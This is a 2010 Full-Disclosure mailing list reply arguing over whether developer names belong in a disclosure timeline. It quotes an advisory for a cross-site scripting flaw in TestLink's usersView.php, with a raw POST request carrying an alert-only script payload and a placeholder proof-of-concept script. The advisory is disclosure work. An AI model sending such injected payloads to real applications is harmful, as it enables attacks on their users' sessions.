Re: [Full-disclosure] Cross site scriping Vulnerabilites in Testlink TestManagement and Execution System

From: Prashant <clickprashant_at_nospam>
Date: Fri Jan 15 2010 - 18:26:43 GMT
To: <jeffwillis30@gmail.com>

Jeff ,

I dont know its right or wrong to disclose developer name in a timeline but some times it helps finding the contact points of the vendor from old mail archive and in my case it did help. I know its debatable ..

There are lots of advisories which had used timelines and these have been released by reputed companies. http://lists.grok.org.uk/pipermail/full-disclosure/2009-December/071923.html http://lists.grok.org.uk/pipermail/full-disclosure/2009-October/071052.html

If Vendor is big company i guess its not a good idea to state Vendor name in timeline. But if vendor is opensource then i guess there is no harm giving developer name in timeline .Getting contact point of open source softwares can some times be painful.

Btw that i know there is no real world revelance of and exploit for XSS which triggers a jscript alert. The POC which i gave with this advisory was just to Verify the issue as this particular XSS can only be exploited with an "Authenticated HTTP POST"

On Fri, 15 Jan 2010 18:29:09 +0530 wrote
>Prashant,Usually we do not mention the engineer/dev name's in a timeline, that's totaly a jackass move.Anyone civilized would mention in this case :Â "{DATE} says "
Btw posting an "exploit" to trigger a Js alert, it's priceless; Dude you made my night.Â Â 2010/1/15 Prashant 1.Title :Cross site scriping Vulnerabilites in Testlink TestManagement and Execution System. Discovered by: Prashant Khandelwal (clickprashant@gmail.com)

2.Vulnerability Information
  Class: Cross site scriping
  Impact :Code execution
  Remotely Exploitable: Yes
  Locally Exploitable: No

3. Vulnerable packages.

Versions affected :All versions ">alert(726367128870)%3B

Request

POST /testlink/lib/usermanagement/usersView.php HTTP/1.0

   Accept: */*
   Content-Type: application/x-www-form-urlencoded    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)    Host: x.x.x.x
   Content-Length: 146
   Cookie: PHPSESSID=8ea021778858f826c5aab8be8f38868c;TL_lastTestProjectForUserID_1=2381    Connection: Close
   Pragma: no-cache

operation=order_by_role&order_by_role_dir=asc&order_by_login_dir=1>">alert(726367128870)%3B&user_order_by=order_by_login

5. Proof Of Concept

#!/usr/bin/env bash # Prashant Khandelwal [clickprashant@gmail.com] # Cross site scripting in Testlink the Test Management Tool

# Vendor : Testlink http://www.teamst.org # Affected Version : userView.php

echo "Please open userView.php in browser a java script alert with text 123456789 should pop up"

6. Report Timeline

I) 5-Jan-2010

Vulnerability dicovered

II) 11-Jan-2010

Notified about the vulnerability to the developer Francisco Mancardi & Martin Havlat from testlink team

IV) 11-Jan-2010

Francisco Mancardi ask for POC.

V) 14-Jan-2010

POC's given

VI) 15-Jan-2010

Francisco Mancardi says these vulnerabilities cannot be patched at the moment and has not commited any timeline for fixing the same.

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

This message: [ Message body ]
Next message: Christian Sciberras: "Re: [Full-disclosure] All China, All The Time"
Previous message: mu-b: "[Full-disclosure] un-SafeCentral"
Maybe in reply to: Prashant : "[Full-disclosure] Cross site scriping Vulnerabilites in Testlink TestManagement and Execution System"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ]